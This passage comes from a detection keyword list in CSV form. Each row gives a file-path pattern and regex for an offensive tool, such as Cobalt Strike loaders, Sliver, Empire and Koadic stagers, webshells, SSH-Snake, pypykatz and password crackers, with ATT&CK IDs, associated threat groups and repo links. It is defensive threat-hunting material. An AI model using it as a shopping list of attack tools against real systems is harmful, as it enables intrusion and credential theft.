"*/src/john.com*",".{0,1000}\/src\/john\.com.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11590"
"*/src/jumbo.c*",".{0,1000}\/src\/jumbo\.c.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11591"
"*/src/jumbo.h*",".{0,1000}\/src\/jumbo\.h.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11592"
"*/src/KaynStrike.c*",".{0,1000}\/src\/KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","11593"
"*/src/nysm.c*",".{0,1000}\/src\/nysm\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","11594"
"*/src/pendulum.c*",".{0,1000}\/src\/pendulum\.c.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","11595"
"*/src/pendulum.h*",".{0,1000}\/src\/pendulum\.h.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","11596"
"*/src/RecycledGate.h*",".{0,1000}\/src\/RecycledGate\.h.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","11597"
"*/src/Sleeper.cpp*",".{0,1000}\/src\/Sleeper\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","11598"
"*/src/unixshell.rs*",".{0,1000}\/src\/unixshell\.rs.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","11599"
"*/src/winsos.cpp*",".{0,1000}\/src\/winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","11600"
"*/srdi-shellcode.go*",".{0,1000}\/srdi\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11601"
"*/srv/kidlogger*",".{0,1000}\/srv\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","11602"
"*/SSH R.A.T.exe*",".{0,1000}\/SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","11603"
"*/ssh2-enum-algos.nse*",".{0,1000}\/ssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11604"
"*/sshamble.git*",".{0,1000}\/sshamble\.git.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","11605"
"*/sshame*",".{0,1000}\/sshame.{0,1000}","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","#linux","N/A","N/A","1","75","16","2024-03-24T11:07:35Z","2019-08-25T16:50:56Z","11606"
"*/ssh-auth-methods.nse*",".{0,1000}\/ssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11607"
"*/ssh-brute.nse*",".{0,1000}\/ssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11608"
"*/ssh-hostkey.nse*",".{0,1000}\/ssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11609"
"*/sshimpanzee.git*",".{0,1000}\/sshimpanzee\.git.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","11610"
"*/ssh-publickey-acceptance.nse*",".{0,1000}\/ssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11612"
"*/ssh-run.nse*",".{0,1000}\/ssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11613"
"*/SSH-Snake.git*",".{0,1000}\/SSH\-Snake\.git.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11614"
"*/SSH-Snake/*",".{0,1000}\/SSH\-Snake\/.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11615"
"*/sshv1.nse*",".{0,1000}\/sshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11625"
"*/ssl-ccs-injection.nse*",".{0,1000}\/ssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11627"
"*/ssl-cert.nse*",".{0,1000}\/ssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11628"
"*/ssl-cert-intaddr.nse*",".{0,1000}\/ssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11629"
"*/ssl-date.nse*",".{0,1000}\/ssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11630"
"*/ssl-dh-params.nse*",".{0,1000}\/ssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11631"
"*/ssl-enum-ciphers.nse*",".{0,1000}\/ssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11632"
"*/ssl-heartbleed.nse*",".{0,1000}\/ssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11633"
"*/ssl-known-key.nse*",".{0,1000}\/ssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11634"
"*/ssl-poodle.nse*",".{0,1000}\/ssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11635"
"*/sslv2.nse*",".{0,1000}\/sslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11636"
"*/sslv2-drown.nse*",".{0,1000}\/sslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11637"
"*/ssp/decryptor.py",".{0,1000}\/ssp\/decryptor\.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","11638"
"*/SspiUacBypass.git*",".{0,1000}\/SspiUacBypass\.git.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","11639"
"*/ssploit/*",".{0,1000}\/ssploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","11640"
"*/SSRFmap*",".{0,1000}\/SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","11641"
"*/sstp-discover.nse*",".{0,1000}\/sstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11642"
"*/Sst-Sheller.php*",".{0,1000}\/Sst\-Sheller\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11643"
"*/StackCrypt.git*",".{0,1000}\/StackCrypt\.git.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","11644"
"*/stager.ps1*",".{0,1000}\/stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11645"
"*/stager/powershell.py*",".{0,1000}\/stager\/powershell\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11646"
"*/stager/powershell/payload.ps1*",".{0,1000}\/stager\/powershell\/payload\.ps1.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11647"
"*/stagers/*.ps1*",".{0,1000}\/stagers\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11648"
"*/stagers/CSharpPS*",".{0,1000}\/stagers\/CSharpPS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 